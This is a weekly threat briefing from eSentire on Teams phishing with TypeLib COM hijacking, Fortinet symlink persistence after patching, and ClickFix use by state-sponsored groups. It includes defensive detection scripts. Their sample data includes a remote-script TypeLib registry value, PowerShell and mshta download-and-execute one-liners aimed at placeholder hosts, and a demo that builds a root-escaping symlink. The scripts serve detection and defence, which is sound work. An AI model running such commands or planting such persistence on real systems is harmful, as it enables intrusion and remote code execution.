Threat Briefing — Apr 17, 2025

Weekly Threat Briefing - Apr 14 - Apr 17

TLP: CLEAR - This information may be shared publicly

eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.


Noteworthy News

Hijacked and Hidden: New Backdoor and Persistence Technique

Bottom Line: Details have emerged on a new Microsoft Teams-based phishing attack which results in threat actors gaining access to victim machines through the Quick Assist tool.

On April 11th, ReliaQuest released a report on a new Microsoft Teams phishing campaign that employs a previously unseen persistence method, TypeLib COM hijacking, together with a new PowerShell backdoor. The attack specifically targeted the finance and professional services sectors, using precisely timed phishing attempts against executive-level employees, particularly those with female-identifying names. The attackers leveraged Windows' Quick Assist tool for initial access, used the Component Object Model (COM) TypeLib hijacking technique for persistence, and ultimately deployed a PowerShell backdoor that used Telegram for Command-and-Control (C2) communications.

The infection chain begins with the adversary sending phishing messages to employees through Microsoft Teams. The attacker used a fraudulent Microsoft 365 tenant with the display name "Technical Support" to impersonate an IT staff member. After making contact, the attackers would convince the victims to launch the built-in Windows Quick Assist tool, giving the attackers remote access to the victim's system. With Quick Assist as their entry point, the attackers used an uncommon persistence technique known as TypeLib hijacking, which involves manipulating the Windows Registry so that legitimate COM objects are redirected to malicious scripts hosted on external URLs.

Once the hijacked COM object is accessed, whether by opening Internet Explorer or any application that uses Internet Explorer components, the redirected script downloads and executes malware hosted on a Google Drive URL. The malicious payload is also downloaded automatically after system restarts. In the final stage a PowerShell backdoor is deployed: it constructs a C2 beacon URL from the infected device's hard drive serial number, creates a WebClient object to receive commands or second-stage malware, and runs an infinite loop that downloads and executes those commands.
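The persistence step above rewrites TypeLib registrations so that COM resolves a remote script instead of a local type library. The following check, added here as an illustration rather than code from ReliaQuest or eSentire, parses the text of a `reg export` of HKCU\Software\Classes\TypeLib and flags win32/win64 paths that are not local files; the sample export, its GUIDs and the host name are constructed placeholders, not indicators from the report.

```python
import re
from typing import Optional

# Constructed .reg export (a real `reg export` file is UTF-16; open it with
# encoding="utf-16"). GUIDs and host are placeholders, not indicators.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{AAAA1111-0000-0000-0000-000000000001}\1.0\0\win32]
@="C:\\Windows\\System32\\stdole2.tlb"

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{BBBB2222-0000-0000-0000-000000000002}\1.0\0\win32]
@="script:https://example.invalid/update.sct"
"""

# Subkey header ...\TypeLib\{GUID}\<version>\<lcid>\win32|win64 whose default
# value is the path COM loads; per-user (HKCU) entries override HKLM ones.
KEY_RE = re.compile(
    r"^\[(?P<key>.*\\TypeLib\\(?P<guid>\{[0-9A-Fa-f-]+\})\\[^\\]+\\[^\\]+\\win(?:32|64))\]$"
)
VALUE_RE = re.compile(r'^@="(?P<val>.*)"$')
# A legitimate registration resolves to a local file: drive letter, UNC path or
# an environment variable such as %SystemRoot%. Anything else deserves a look.
LOCAL_PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\|%[A-Za-z_]+%)")


def unescape_reg(value: str) -> str:
    # Undo .reg string escaping (doubled backslashes and escaped quotes).
    return value.replace('\\"', '"').replace("\\\\", "\\")


def classify(path: str) -> Optional[str]:
    """Why a path is suspicious, or None if it points at a local file."""
    if LOCAL_PATH_RE.match(path):
        return None
    if "://" in path:
        return "remote_url"  # e.g. script:https://... or a bare https://...
    if re.match(r"^[A-Za-z]{2,}:", path):
        return "moniker"  # a scheme prefix that is not a drive letter
    return "non_local_path"


def suspicious_typelib_entries(reg_export: str) -> list:
    """One finding per win32/win64 default value that is not a local file path."""
    findings, current = [], None
    for raw in reg_export.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = m.groupdict() if m else None
            continue
        m = VALUE_RE.match(line)
        if current and m:
            path = unescape_reg(m.group("val"))
            reason = classify(path)
            if reason:
                findings.append({**current, "path": path, "reason": reason})
    return findings
```

Any per-user TypeLib registration is worth reviewing even when it points at a local file, since HKCU entries take precedence over the machine-wide ones in HKLM.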

ReliaQuest has not provided details on how the backdoor was used following its deployment. Threat actors could employ backdoor access for a variety of purposes ranging from information theft to the deployment of other malware including ransomware.

eSentire Threat Intelligence Analysis:

The early stage of the attacks aligns with the techniques of Storm-1811, a threat group known to deploy Black Basta ransomware. However, the later stages show a new method for maintaining persistence that deviates from the group's typical practices. This change suggests that the group may be evolving its techniques or possibly splitting. Several details in the report suggest that the attacks were designed to exploit specific gaps. For instance, the phishing attempts were carefully timed to occur between 2:00 p.m. and 3:00 p.m., a period when employees are often less alert to malicious activity. Additionally, the attackers targeted executive-level employees, such as directors and vice presidents, individuals who hold valuable access. Moreover, the attackers exclusively targeted employees with female-sounding names; ReliaQuest suggests that they may have relied on research into trends in phishing susceptibility to maximize their success rate.

Two separate threat actor groups observed by Sophos used similar attack techniques, including email bombing and vishing attacks on Microsoft Teams, to access a host through legitimate software. This highlights the effectiveness of social-engineering attacks. With the introduction of TypeLib COM hijacking, a new technique designed for persistence, attackers ensure that they maintain a foothold in the victim's system, remaining active whenever the application is used, all while leveraging legitimate system functionality for stealth. The combination of these techniques in attacks indicates that adversaries are adopting a more strategic approach to compromising organizations.

To defend against such attacks, it is critical that users are trained to identify and report social engineering attempts. Additionally, organizations can prevent the abuse of Microsoft Teams in this context by blocking external Microsoft tenants if they are not required for legitimate business purposes. Similarly, organizations should consider blocking all Remote Monitoring and Management (RMM) tools that are not used for legitimate purposes. Email spam filtering will help minimize the impact, decreasing the likelihood of successful social engineering via Microsoft Teams or malicious phone calls (vishing).

In response to the release of this report, the eSentire Threat Intelligence team is actively monitoring this topic and exploring new detection opportunities. For additional insights into how threat actors are gaining initial access and exploiting legitimate RMM tools, the eSentire Threat Intelligence team has released an advisory on email bombing and provided an in-depth analysis in the October eSentire TRU Intelligence Briefing webinar.

Fortinet Warns on Threat Activity Targeting Patched Vulnerabilities

Bottom Line: Attackers are exploiting known vulnerabilities in Fortinet devices to achieve persistent read-only access even after patches are applied, highlighting the need for organizations to adopt a comprehensive security strategy beyond just patch management.

On April 10th, Fortinet released an advisory warning about a new post-exploitation activity where attackers leveraged known vulnerabilities to maintain read-only access to the vulnerable Fortinet devices even after the flaws were patched.

In recent incidents observed by Fortinet, the threat actors leveraged previously known vulnerabilities in Fortinet products including, but not limited to, CVE-2024-21762 (CVSS: 9.8), CVE-2023-27997 (CVSS: 9.8), and CVE-2022-42475 (CVSS: 9.8). According to the cybersecurity news outlet Bleeping Computer, Fortinet initially notified its customers about the activity via email before releasing the public warning. According to Fortinet's report, the attackers initially leveraged the mentioned vulnerabilities to infiltrate the victim organization's network. They then used a novel post-exploitation technique to maintain read-only access to the compromised Fortinet devices, even after the original vulnerability used for initial access had been addressed.

Upon successfully breaching the device, the attackers created a symbolic link connecting the user filesystem and the root filesystem, placed within a directory used to serve language files for the SSL-VPN. This symbolic link enabled the threat actors to retain read-only access to files on the victim device's filesystem, potentially including configuration files. Because the modification was located in the user filesystem, it went undetected and persisted even after FortiOS was updated to mitigate the vulnerability, leaving the symbolic link intact. Fortinet noted that customers who have never enabled SSL-VPN are not impacted by the issue.
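The persistence mechanism described above is a symlink inside a web-served directory whose target lies outside that directory. The check below is an added illustration, not Fortinet's or eSentire's tooling: Fortinet's advisory does not publish the affected directory, so the tree is constructed under a temporary directory, with `<base>` standing in for the device root and `<base>/www/lang` for the served language-file directory; against a real extracted backup or served root, call `find_escaping_symlinks()` directly.

```python
import os
import tempfile


def find_escaping_symlinks(served_root: str) -> list:
    """(link, link target, resolved path) for each symlink whose real path leaves served_root."""
    root = os.path.realpath(served_root)
    escapes = []
    # followlinks=False: never descend through a link, so a link to the filesystem
    # root cannot drag the walk across the whole device.
    for dirpath, dirnames, filenames in os.walk(served_root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            resolved = os.path.realpath(full)  # also resolves ../.. chains and nested links
            if os.path.commonpath([root, resolved]) != root:
                escapes.append((full, os.readlink(full), resolved))
    return escapes


def demo() -> list:
    """Constructed tree: <base> stands in for the device root and <base>/www/lang is the
    served language-file directory. Returns (link relative to base, link target)."""
    base = tempfile.mkdtemp()
    lang = os.path.join(base, "www", "lang")
    os.makedirs(lang)
    with open(os.path.join(lang, "en.json"), "w") as f:
        f.write("{}")
    # Benign: a link that stays inside the served tree is not reported.
    os.symlink("en.json", os.path.join(lang, "default.json"))
    # The pattern from the advisory: a link inside the served directory that points
    # at the filesystem root, exposing everything beneath it read-only via the portal.
    os.symlink(os.path.join("..", ".."), os.path.join(lang, "fs"))
    found = find_escaping_symlinks(os.path.join(base, "www"))
    return [(os.path.relpath(link, base), target) for link, target, _ in found]
```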

Fortinet outlined mitigation steps in their advisory, recommending that affected customers upgrade to the secure FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, or 6.4.16. They also advised conducting a thorough inspection of all configuration files and following the prescribed measures if a compromised host is detected. On April 11th, CISA issued a security advisory highlighting the new post-exploitation technique and recommended that organizations disable SSL-VPN until the necessary patches are applied and follow the mitigations provided by Fortinet.

The activity did not appear to target any particular geographic region or industry. However, on April 12th, watchTowr reported observing the post-exploitation activity across their client base, which included organizations in critical infrastructure sectors. No further details were revealed by watchTowr.

eSentire Threat Intelligence Analysis:

The post-exploitation activity reported by Fortinet underscores that organizations cannot rely solely on patching vulnerabilities: attackers use stealthy techniques such as planting symbolic links to evade detection, which calls for a more comprehensive security approach. Although the identities of the attackers responsible for this activity remain unknown, their actions demonstrate a high level of sophistication and a deep understanding of the Fortinet devices' filesystem architecture. The attackers' ability to devise a technique that preserves access to the devices even after the vulnerabilities were patched suggests that they are highly strategic and have significant experience in targeting network infrastructure.

While Fortinet did not disclose the exact timeline of the post-exploitation activity, the Computer Emergency Response Team of France (CERT-FR) released an alert indicating that it has observed the technique being used to compromise multiple devices in France since early 2023. Fortinet vulnerabilities have been a favored target for attackers because of the products' widespread use and the number of potentially vulnerable Internet-facing devices. A critical zero-day vulnerability, CVE-2024-55591, impacting multiple versions of FortiOS and FortiProxy, was exploited in the wild in January 2025 to gain privileged access to vulnerable Fortinet devices.

Organizations are recommended to deploy effective vulnerability assessment and patch management solutions to address known security flaws and minimize the risk of exploitation. It is strongly advised that FortiOS be updated to the latest secure versions without delay. To counter the threat posed by the newly identified post-exploitation technique highlighted in the Fortinet report, administrators should enforce stricter device hardening practices, including routine reviews of device configuration files. Additionally, following CISA’s guidance, SSL-VPN should be disabled on Fortinet devices until the necessary patches are fully applied.

eSentire has been consistently monitoring the vulnerabilities disclosed in Fortinet devices to develop opportunities for detecting exploitation. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify devices vulnerable to the mentioned flaws, and eSentire MDR for Network has rules in place to identify exploitation attempts involving CVE-2024-21762 and CVE-2023-27997. eSentire released a security advisory addressing CVE-2024-55591 on January 14th, 2025.

State-Sponsored Actors Try ClickFix

Bottom Line: Proofpoint researchers discovered that state-sponsored threat actors from North Korea, Iran, and Russia have adopted the "ClickFix" social engineering technique between October 2024 and January 2025.

On April 17th, 2025, Proofpoint released a report providing details on phishing campaigns originating from state-sponsored APT groups from North Korea, Iran, and Russia. The phishing campaigns were observed from October 2024 to January 2025 and are notable in that they all involved the use of the ClickFix social engineering technique. In ClickFix, users are presented with a fake CAPTCHA that prompts them to paste and execute an attacker-provided PowerShell command into the Windows Run box, or directly into PowerShell itself, which results in the deployment of malware.
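Because the Run box hands the pasted command to explorer.exe, a script host spawned by explorer.exe with download-and-execute flags is a useful shape to hunt for. The rule below is an added illustration, not Proofpoint's or eSentire's detection content; the events are constructed and use Sysmon Event ID 1 field names, the URLs are placeholders, and the rule also covers an mshta variant that the report itself does not mention. Commands typed directly into an existing PowerShell console have a different parent and are out of scope here.

```python
import re

# Constructed process-creation events with Sysmon Event ID 1 field names. The Run
# box hands the pasted command to explorer.exe, so a script host spawned by
# explorer.exe with download-and-execute flags is the shape this rule looks for.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign admin script: not flagged
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # same lure, mshta variant
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha.hta"},
    {"ParentImage": r"C:\Windows\System32\services.exe",  # not from the Run box:
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # another rule's job
     "CommandLine": "powershell -enc AAAA"},  # placeholder, not a real payload
]

LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Markers of the download-and-run one-liners a ClickFix page asks the user to paste.
INDICATORS = [
    (r"(?<![\w-])-w(?:indowstyle)?\s+hidden", "hidden_window"),
    (r"(?<![\w-])-e(?:nc|ncodedcommand)?\s", "encoded_command"),
    (r"\b(?:iex|invoke-expression)\b", "invoke_expression"),
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", "web_download"),
    (r"mshta(?:\.exe)?\s+[\"']?\S*://", "mshta_remote"),
    (r"https?://", "url_in_commandline"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_hits(event: dict) -> list:
    """Indicator names matched by a Run-box launch, or [] if the event does not fit."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return []
    if basename(event["Image"]) not in LAUNCHERS:
        return []
    cmd = event["CommandLine"]
    return [name for pat, name in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]


def triage(events: list) -> list:
    """(command line, hits) for events matching two or more indicators; a single
    indicator (a URL in an argument, say) is too noisy to alert on by itself."""
    return [(ev["CommandLine"], clickfix_hits(ev)) for ev in events if len(clickfix_hits(ev)) >= 2]
```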

In October and December of 2024, Proofpoint observed APT groups from Russia (UNK_RemoteRogue and TA422) sending phishing emails that made use of ClickFix. The emails sent by UNK_RemoteRogue targeted organizations within the defense industry and resulted in the deployment of the PowerShell Empire Command-and-Control (C2) framework. The emails sent by TA422 contained ClickFix pages that were used to deploy SSH tunnels and Metasploit.

In November 2024, the Iranian APT group TA450 (aka MuddyWater and Mango Sandstorm) was observed sending phishing emails, primarily to organizations in the Middle East but also to some global targets, using fake Microsoft security updates as the lure. The emails provided instructions for applying the "security patches", which were in fact the ClickFix attack steps; execution of the malicious PowerShell commands resulted in the Level Remote Monitoring and Management (RMM) software being deployed.

In January 2025, the North Korean APT group TA427 sent phishing emails to organizations in the think tank sector in an attempt to build trust. Once rapport was established, the attackers would send follow-up emails containing a URL that directed victims to the ClickFix page. This campaign resulted in the deployment of the open-source Remote Access Trojan (RAT) QuasarRAT.

Proofpoint notes that after these campaigns were observed, all of the groups except the North Korean APT TA427 reportedly returned to their standard campaigns. TA427 was observed in April 2025 with a new campaign involving the ClickFix technique. Proofpoint assesses that the lack of further campaigns from some of the APT groups suggests that the adoption of ClickFix may have been a trial, that the groups may still be developing their campaigns, or that the threat actors did not have as much success with ClickFix as with their previous techniques.

eSentire Threat Intelligence Analysis:

The campaigns highlighted by Proofpoint are not the only examples of state-sponsored APT groups using the ClickFix technique, with additional North Korean threat actors having recently been observed making use of it as well. ClickFix was observed in an extension of the Contagious Interview campaign (referred to as ClickFake) run by the Lazarus Group for financially motivated attacks. ClickFix was also observed in use by the group Kimsuky (Emerald Sleet), first reported in February 2025, where it was used to deploy browser-based remote desktop tools to gain access to victim machines and exfiltrate data.

The adoption of the ClickFix technique by state-sponsored APT groups within phishing campaigns replaces the infection and execution stages of their previous attack chains but does not otherwise change existing campaigns in any major way. The cyber threat landscape is constantly evolving, with new and existing Tactics, Techniques, and Procedures (TTPs) emerging and developing. However, APT groups adopting TTPs first used by other threat actors is not a new trend. Examples include North Korean APT groups' use of crypto miners to fund the North Korean regime, the deployment of ransomware by APT groups to generate funds or cover their tracks, and the use of publicly available Proof-of-Concept (PoC) exploit code to exploit known vulnerabilities.

With the adoption of effective TTPs used to perform attacks, state-sponsored APT activity can blend in with any other threat activity observed in the wild. Organizations should ensure that effective cyber security strategies are implemented to defend against these types of attacks. Recommendations include disabling the Windows Run box via Group Policy Object (GPO) to prevent users from being able to execute ClickFix attacks and implementing Phishing and Security Awareness Training (PSAT) programs to train users how to identify and report malicious content.

eSentire's Threat Intelligence team has observed a large spike in the ClickFix initial access method being used to deploy various information stealers and RATs over the past year. eSentire MDR for Network and MDR for Endpoint have detections in place to monitor for ClickFix-related traffic and post-exploitation activity. eSentire's Threat Response Unit (TRU) has published a blog and two advisories on ClickFix being used to deliver MintsLoader, Lumma Stealer, and NetSupportRAT, as well as being covered as a topic in the February 2025 TRU Intelligence Briefing. Given the adoption of the ClickFix technique by various threat actors, its use and adoption by additional threat actor groups will likely continue into the future.

About the threat briefings:

The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.

eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.
